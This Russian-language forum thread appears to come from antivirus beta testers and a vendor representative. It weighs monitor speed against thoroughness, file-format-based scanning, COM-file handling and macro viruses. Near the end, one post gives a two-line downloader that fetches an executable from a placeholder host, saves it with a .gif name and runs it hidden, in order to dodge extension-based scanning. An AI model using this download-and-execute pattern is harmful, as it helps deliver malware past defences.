Если теперь нужно еще и картинки проверять на вирусы, то скоро до 30% вычеслительных мощностей будет уходить на безопасность. Не надо поддаваться панике, ставим заплатку и пусть себе не проверяют антивирусы эти картинки, не барское это дело из-за одной дырки загружать пользовательские компьютеры, они и так бедные на пыхтят от нагрузки.

Если теперь нужно еще и картинки проверять на вирусы, то скоро до 30% вычеслительных мощностей будет уходить на безопасность. Не надо поддаваться панике, ставим заплатку и пусть себе не проверяют антивирусы эти картинки, не барское это дело из-за одной дырки загружать пользовательские компьютеры, они и так бедные на пыхтят от нагрузки.

30% это ещё по божески. Я вон с КАВ перешел на Vba32, так комп раза в 2 быстрее заработал :)

Я тоже попробовал VBA: честно говоря, я бы выбрал Каспера ;D.
Но, к счастью, всё таки Доктор не так уж и плох, как говорят ;D

Я тоже попробовал VBA: честно говоря, я бы выбрал Каспера ;D.

По надёжности, понятное дело :)

30% это ещё по божески. Я вон с КАВ перешел на Vba32, так комп раза в 2 быстрее заработал :)

По божески??? Я что, покупаю компьютер, для того что бы 2 дня в неделю заниматься ловлей вирусов? Нет мне, работать надо, а когда дело доходит до видео или компиляции чего нибудь эдакого - мне все мои 3000 "попугаев" нужны, и не собираюсь я львиную их долю отдавать за красивые глазки. Безопасность безопасностью, но и меру надо чувствовать.

На счет VBA, полностью согласен. На следующей неделе посмотрю как это чудо на P166 выглюдит в сравнении с DrWeb. Огорчает, что нет проверки "по формату", как в DrWeb. К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает. Давайте настоим на включении в VBA такой функции, мы же beta-тестеры :D.

Огорчает, что нет проверки "по формату", как в DrWeb. К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает. Давайте настоим на включении в VBA такой функции, мы же beta-тестеры :D.

Я так понимаю что они в любом случае проверяют структуру файла, и дальше работают с ним в соответствии со структурой. Нужно будет спросить, если тут на заметят вопрос :)

К стате DrWeb с включенной проверкой всех файлов тоже не очень шустро бегает.

Это ерунда, ты переключи его в режим проверки файлов при открытии и запуске. Вот это весело. У меня когда Ослик работал и переодически читал из самораскрывающегося архива мег на 300 комп подвисал намертво.

Это ерунда, ты переключи его в режим проверки файлов при открытии и запуске. Вот это весело. У меня когда Ослик работал и переодически читал из самораскрывающегося архива мег на 300 комп подвисал намертво.

Я об этом речь и веду, производительность зависит не только от оптимизации алгоритмов, но и от объема проверяемых файлов. Вообще, теоретически, нужно, что бы монитор использовал не все записи базы, а только актуальные для данного компьютера. Вместо этого именно антивирус должен следить за закрытием дырок.
Полный заслон желательно ставить только в местах возможного проникновения вирусов, фильтры почты, сканирование сменных носителей, интернет трафик, а действия пользователя внутри "периметра" прверять по сокращенной программе (например только изменившиеся файлы и автозагрузку). Вместо этого в базы можно добавить информацию об уязвимостях и способах их перекрытия. Ведь значительная часть современных вирусов становится безполезной, если в системе закрыты все дырки. Выигрыш в скорости защет сокращения объема дурной работы должен быть значителен.

Я об этом речь и веду, производительность зависит не только от оптимизации алгоритмов, но и от объема проверяемых файлов. Вообще, теоретически, нужно, что бы монитор использовал не все записи базы, а только актуальные для данного компьютера. Вместо этого именно антивирус должен следить за закрытием дырок.
Полный заслон желательно ставить только в местах возможного проникновения вирусов, фильтры почты, сканирование сменных носителей, интернет трафик, а действия пользователя внутри "периметра" прверять по сокращенной программе (например только изменившиеся файлы и автозагрузку). Вместо этого в базы можно добавить информацию об уязвимостях и способах их перекрытия. Ведь значительная часть современных вирусов становится безполезной, если в системе закрыты все дырки. Выигрыш в скорости защет сокращения объема дурной работы должен быть значителен.

Ну представь себе что проскочил неизвестный вирус. На самом компе ты все файлы не проверяешь, значит через какое-то время даже если этот вирус добавлен в базу данных он будет спокойно жить пока ты не запустишь полное сканирование. Именно такие проблемы у ДрВеб с их "оптимальным режимом". Если ты уверен что не запускаешь на компе левые программы, в которых могут быть вирусы или трояны, то просто отключи монитор, и раз в неделю делай полное сканирование на всякий случай. А для чайников постоянная проверка всех файлов монитором необходима.

Я так понимаю что они в любом случае проверяют структуру файла, и дальше работают с ним в соответствии со структурой. Нужно будет спросить, если тут на заметят вопрос :)

Верно, формат файла всегда определяется и проверка далее идет в соответствии с форматом. Да, есть один такой неприятный формат файлов - досовские COM исполняемые файлы. Так вот, на самом деле они совсем не имеют формата и их невозможно распознать. Так что есть выбор: либо проверять все файлы с размером менее 64K как COM файлы и дополнительно тормозить систему (а COM-вирусы уже практически вымерли как класс), либо придумать что-то еще. Так вот, мы пошли вторым путем и в файлах, не имеющих исполняемого расширения (COM, EXE, PIF, SCR, ...), COM-вирусы в нормальном режиме сканирования не ищем. С точки зрения безопасности, проблем тут нет, с неправильным расширением такой файл запустить не получится, его все равно придется переименовать, а в этом случае монитор его поймает. Есть еще 'избыточный' режим, в котором поиск COM-фирусов производится во всех файлах подходящего размера, независимо от расширения, а также используется ряд других дополнительных методов поиска вирусов, которые обычно не нужны, но могут помочь в каких-либо крайне нестандартных случаях. Кстати, при тестировании антивируса на коллекции вирусов лучше избыточный режим включать, поскольку вирусы в коллекциях обычно лежат в переименованном виде.

Кстати, для антивирусного монитора у нас 'избыточный режим' и проверка архивов не используются и их невозможно включить (раньше эти опции были доступны в настройках). Но опыт показывает, что всегда находятся желающие защититься 'по полной программе', которые потом начинают жаловаться, что комп тормозит :)

Ну представь себе что проскочил неизвестный вирус. На самом компе ты все файлы не проверяешь, значит через какое-то время даже если этот вирус добавлен в базу данных он будет спокойно жить пока ты не запустишь полное сканирование. Именно такие проблемы у ДрВеб с их "оптимальным режимом". Если ты уверен что не запускаешь на компе левые программы, в которых могут быть вирусы или трояны, то просто отключи монитор, и раз в неделю делай полное сканирование на всякий случай. А для чайников постоянная проверка всех файлов монитором необходима.

Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?

Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?

Разные причины есть. Вот отключил ты зачем-то временно монитор, запустил случайно вирус, а потом включил, и долго ещё не узнаешь что у тебя вирус. А если проверять все файлы, то очень быстро монитор начнёт ругаться.

Ну, проскачил, для жития ему необходимо запуститься, а тут его можно и накрыть при проверке автозагрузки или накрыть при запуске. Зачем проверять все подвернувшиеся файлы?

Осталась только научиться отличать обычное открытие файла от его запуска :)
А это не так просто, например есть макровирусы в doc-файлах и скриптовые вирусы в текстовых файлах. Запуск интерпретатора (того же ворда, например) сам по себе не опасен. Проблемы начинаются, когда этот интерпретатор открывает файл, содержащий вирус, и начинает исполнять код, прочитанный оттуда.

aga... a kak vam takoy variatn?

downloader.exe :)

UrlDownloadToFile("www.vir.com/vir.exe","c:\program.gif");
WinExec("c:\program.gif",SW_HIDE);

:) vba v prolete... :) da i mnogie drugie toze :)

aga... a kak vam takoy variatn?

downloader.exe :)

UrlDownloadToFile("www.vir.com/vir.exe","c:\program.gif");
WinExec("c:\program.gif",SW_HIDE);

:) vba v prolete... :) da i mnogie drugie toze :)


Установка 'проверять все файлы' поможет в данной ситуации :)
Также downloader.exe в данном случае является вредоносной программой и его вполне можно детектировать как трояна.

nu skazem downloader.exe ne lovitsa a banner.gif lovitsa ;)

no u 99.99% proverka stoit nikak ne "all files" :) tak 4to.. virus budet zapushen i zdelaet svoe delo

nu skazem downloader.exe ne lovitsa a banner.gif lovitsa ;)

no u 99.99% proverka stoit nikak ne "all files" :) tak 4to.. virus budet zapushen i zdelaet svoe delo

Поэтому было бы неплохо если бы антивирус мог работать как локальный прокси, и фильтровать весь трафик.

Поэтому было бы неплохо если бы антивирус мог работать как локальный прокси, и фильтровать весь трафик.

Плюс скрипт-эвристик совместимый с IE, Mozilla и Opera. И вообще высший класс бы получился.